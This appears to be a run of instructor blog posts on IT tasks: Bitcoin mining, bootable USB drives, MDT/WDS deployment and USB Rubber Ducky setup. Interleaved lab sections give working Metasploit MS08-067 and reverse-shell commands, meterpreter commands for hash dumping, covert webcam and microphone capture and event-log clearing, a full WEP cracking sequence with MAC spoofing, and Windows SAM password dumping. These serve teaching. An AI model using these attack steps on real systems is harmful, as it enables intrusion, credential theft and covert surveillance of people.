The general recommendation is to not do this.  However, if you just want to try it out, here are some sources for general information.

http://www.startbitcoin.com has some nice introductory information.

You will need to download a wallet from http://www.bitcoin.org.  This download will potentially take a long time.

ASIC miners (Application Specific Integrated Circuit) have taken the place of GPU miners.  ASIC miners are generally expensive and can become dated very quickly.

http://www.butterflylabs.com has some ASIC miners for sale at prices starting at $50 (not recommended).

Follow these steps:

  1. Insert your USB Flash Drive into an available port.
  2. Open the Command Prompt (Admin) by right-clicking on the Start button, clicking Command Prompt (Admin), and then click Yes on the UAC prompt.
  3. Type “diskpart”and press Enter.
  4. Type “list disk” to determine the disk number of your USB Flash Drive.  Type “select disk X”, where “X” is the disk number of your USB Flash Drive.
  5. Type “clean” to erase the contents of your USB Flash Drive.
  6. Type “create partition primary size =5000”. This will create a 5GB primary partition on the USB Flash Drive.  You can later create an additional partition on the USB Flash Drive for persistent storage.
  7. Type “select partition 1”.
  8. Type “active” to make the partition active
  9. Type “format fs=ntfs quick” to format the partition.
  10. Type “assign” to give the USB Flash Drive a drive letter.
  11. Copy the contents of the Windows 8.1 DVD to the USB Flash Drive.

Alternatively, you can download the Universal USB Installer from http://www.pendrivelinux.com and follow the instructions on the site.

Windows XP SP 2 Setup:

Make sure Automatic Updates are disabled, the Windows Firewall is off, and the system has been restarted at least once.

Metasploit:

use exploit/windows/smb/ms08_067_netapi

set rhost 192.168.1.45

exploit #Do not execute at this point if you want to add the payload below

? or help #see the list of available meterpreter commands

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST <attacking_kali_host_ip>

set LPORT <local_port> #default port is 4444

You can verify the connection from the remote machine with the following command:

netstat -a | grep 4444 #4444 assumes default local port

Some interesting Meterpreter commands are:

hashdump #get password hashes to crack, crackstation.net
record_mic #record audio
webcam_list #list available webcams
web_snap #take a picture with the webcam
web_stream #stream video from webcam
sysinfo #get remote system information
shutdown #turn off remote computer
reboot #reboot remote computer
ps #list processes running on remote computer
kill #end process running on remote computer
execute –f <file> #start program on remote machine
clearev #clear the event log
upload #send file to remote system
download #retrieve file from remote system

Cracking WEP in Kali Linux 2.0 has become extrememly easy.  Open WiFite from the Applications menu and at the prompt type:

wifite –wep

Follow the onscreen instructions and the work is done for you.

 

WEP cracking instructions for Kali Linux 1.0

>>>Open a new terminal window

airmon-ng

# Will show you a list of your available wireless interfaces
# Note the name of your wireless interface, normally wlan0 or mon0

airmon-ng stop wlan0

# Stops the airmon-ng daemon

ifconfig wlan0 down

# stops the wireless interface

macchanger –mac 00:11:22:33:44:55 wlan0

# Spoofs your MAC address to hide your identity

airmon-ng start wlan0

# Starts the airmon-ng daemon

airodump-ng wlan0

# Locate available wireless access points to attack
# For our lab, look for WEPDEmo and note BSSID(MAC) and channel

airodump-ng -c 6 -w wepdemoattack –bssid 20:AA:4B:8B:A4:6E wlan0

# Start monitoring WEPDEmo for for associations to attempt to crack
# -c 6 specifies the channel
# -w wepdemoattack specifies the name of the file to save as
# –bssid 20:AA:4B:8B:A4:6E the MAC of the access point you are attacking
# wlan0 the wireless card you are monitoring with

>>>>Open a new terminal window

aireplay-ng -1 0 -a 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 -e WEPDEmo wlan0

# Attempt to associate with the wireless access point
# -1 0 This is the number 1 and specifies the type of attack, fake authentication and    # delay
# -a is the MAC of the access point being attacked
# -h is the spoofed MAC of our system
# -e is the access points SSID
# wlan0 is the interface we are attacking with

aireplay-ng -3 -b 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 wlan0

#Will send traffic to the access point and monitor

aircrack-ng -b 20:AA:4B:8B:A4:6E wepdemoattack-01.cap

# Will attempt to crack the WEP encryption that has been detected so far
# Will check as you run it and then every 5000 ISVs – listed as #Data on the airodump    # terminal
>>>>Open a new terminal window

aireplay-ng -1 0 -a 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 -e WEPDEmo wlan0

#Repeatedly run this to attempt to generate more traffic to speed up the attack
Eventually on the aircrack-ng screen you should see the correct WEP key

26:27:F6:85:97 for my demo

 

 

It appears the 1607 build of Windows 10 breaks the cracking of passwords with pwdump and samdump2.

To crack a Windows 10 Local account password in Kali Linux 2.0 you will need to mount the drive, locate the directory containing the SAM file, dump the password hashes to a file, and then crack with John the Ripper.

Restart the target Windows computer with your KALI Linux 2.0 system.  From time to time when you try to access the hard drive containing the Windows partition you may receive an error message related to the Windows hibernation file.  To avoid this, shutdown Windows at the command prompt with the command:

shutdown /s /t 0

This should prevent the hibernation file problem.  Once you are in KALI, open up FILES and select your Windows hard drive to mount it.  Open a terminal window and enter the command

mount

to determine the path to your Windows hard drive.  Most of the time the Windows hard drive will be the last mount point in the list, normally something like /dev/sda1.  Your path will be something like /media/root/OSDisk.  Browse to your mount point/Windows/System32/config folder.  Use the follwoing command to create a dump of the Windows passwords:

pwdump SYSTEM SAM > /root/Desktop/SAM2

Then use John the Ripper to break the passwords.

john /root/Desktop/SAM2 –format=NT

 

For Kali Linux prior to version 2.0

Open terminal
Open drive in Computer so it will mount
mount to see location of drive
change to /Windows/System32/config folder in mount point

bkhive SYSTEM /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt

john /root/hash.txt –format=nt2

service postgresql start #start the db
service metasploit start # connect metasploit to database
db_rebuild_cache #build cache for searching
db_status # check status of db
db_nmap <target IP> #add listening ports to database
hosts # shows scanned targets
services # show services on targets
search <service  name> # find a possible exploit
use exploit/<exploit name> # run the exploit
show options # for options to configure like set RHOST
check # will see if target is exploitable
exploit # to try the exploit

Here is a summary of how to capture an image for the Deployment Workbench.

  1. Boot the system to be captured and use the sysprep tool.
  2. Boot the system from either the CD or PXE boot and choose command prompt from the menu.
  3. Run diskpart at the command prompt.
  4. list volume # Check the volume of the disk you are imaging to get the correct drive letter
  5. exit #leave diskpart
  6. net use u: \\g212win2012r2\DeploymentShare$ # Capture network drive to place image in.  You will need to adjust based on your server name and deployment share.  This is using the default share created by MDT.  Use domain name in the username.
  7. dism /Capture-Image /CaptureDir:D:\ /ImageFile:U:\Captures\TestImage.wim /Name:”TestImage”
  8. Import captured OS in the Deployment Workbench
  9. Create new task
  10. Boot from CD or PXE to install your newly capture image to another system

Here is a quick outline of the steps I followed to install the MDT and WADK on a Windows Server 2012 R2 System.  Please be advised that these are from notes from the first walkthrough of setting this system up.  I am certain there will be some typos, unnecessary steps, out of order steps, and other issues with these instructions.

  1. Install Microsoft Deployment Tools
  2. Install WADK
  3. Start Deployment Tools and create Deployment Share
  4. Right-click Operating Systems and Import Operating System
  5. Right-click Operating system and update operating system
  6. Create new install task
  7. Burn ISO file in Boot folder to CD
  8. Boot new machine from CD
  9. Start task
  10. From Deployment and Imaging Tools Environment, Create Bootable flash Drive
  11. copype amd64 C:\winpe_amd64
  12. MakeWinPEMedia /UFD C:\winpe_amd64 F:
  13. Create Deployment from Windows System Image Manager
  14. File, Create Distribution Share
  15. Copy install.wim from media to server
  16. Select Windows Image file, will have to create a catalog file

Some helpful links from Microsoft are:

http://technet.microsoft.com/en-us/windows/dn282138

http://technet.microsoft.com/en-us/library/hh825212.aspx

Once you boot from the remote system, you work from the command prompt to create a new image.  The tool is DISM.

I have been playing around with the Microsoft Deployment Toolkit (MDT) on Windows Server 2012 R2 and decided I need to my client machines to perform a PXE boot instead of booting from a CD, which takes quite awhile.  Configuring Windows Deployment Server is a fairly easy process, especially if you all ready have a bootable WIM created from using MDT.  These instructions assume you have already setup MDT on your server and that your server is a member of a Windows Domain.  The basic process is as follows:

  1. Add the Windows Deployment Server (WDS) Role from Server Manager on the server you wish to boot from.  You will need to restart the server after this role is added.
  2. Open a command line to initialize your server with the command wdsutil /Initialize-Server /RemInst:”C:\DeploymentShare\boot”,  assuming you are using the default directory from your MDT installation.  If you encounter an error during the initialize step, you may need to issue the command wdsutil /Uninitialize-Server so that you can fix the error and then try to initialize the server again.
  3. Next you will add the WIM you wish to boot from with the command wdsutil /Add-Image /ImageFile:”c:\DeploymentShare\Boot\LiteTouchPE_x64.wim” /ImageType:Boot.
  4. Check Services to make for sure the Windows Deployment Services Server is running.

Assuming everything worked correctly, you should know be able to connect a computer to the same network as the server and PXE boot from the client to the server without the need of a flash drive or optical disk.  You may need to enable PXE boot on the client machine, or change the boot order of the devices.

Microsoft has a web page that includes all of the syntax for the wdsutil command available at http://technet.microsoft.com/en-us/library/cc771206.aspx.

 

I decided to try out the USB Rubber Ducky http://usbrubberducky.com/ from www.hak5.org.  The downside to the Rubber Ducky is that it does not come with very good documentation for those that want to set it up on the Windows side.  I had a difficult time with the creating the sample tutorial Hello Word duck script, but after an hour or so was able to work through it.  Here is how to setup the Duck from a Windows machine.

  1. Make for sure you have the latest version of Java installed on your computer, and that the Java directory is in your PATH Environment Variable.
  2. Download the DuckEncoder (duckencode.jar) from https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Downloads.  The Duck Encoder was at version 1.2 at the time of this post.  I would recommend creating a directory to hold the Duck Encoder file and the scripts you are going to create.
  3. Remove the MicroSD card from the Duck.  This can be difficult as the MicroSD is very snug, but it will come out.   I actually had to use needle nose pliers to get mine out.
  4. Insert the MicroSD card into the included adapter and plug into a USB slot on your Windows machine.  Your MicroSD card will be assigned a drive letter.
  5. (Optional) Browse to the drive letter and rename the file inject.bin to something like injectOriginal.bin.  I did this to preserve the original inject.bin file on the Duck.
  6. Open Notepad and key in your Duck script.  I used the Hello World script from https://github.com/hak5darren/USB-Rubber-Ducky/wiki/My-first-payload.  Note that if you copy and paste this script into notepad, you will need to remove the blank space at the beginning of each line, otherwise you will get an error.
  7. Save your file (i.e. helloWorld.txt), preferably into the folder with the duckencode.jar file.
  8. Open a command prompt and change to the directory with your script and duckencode.jar files.
  9. At the command prompt, key the following:  java -jar duckencode -i helloWorld.txt -o f:\inject.bin  ##(Note that your drive letter may be different)
  10. Safely remove the USB adapter from your system and insert the MicroSD card back into the Duck.
  11. Insert the duck into a USB port and your script should run.

Some sample payloads are available at https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads .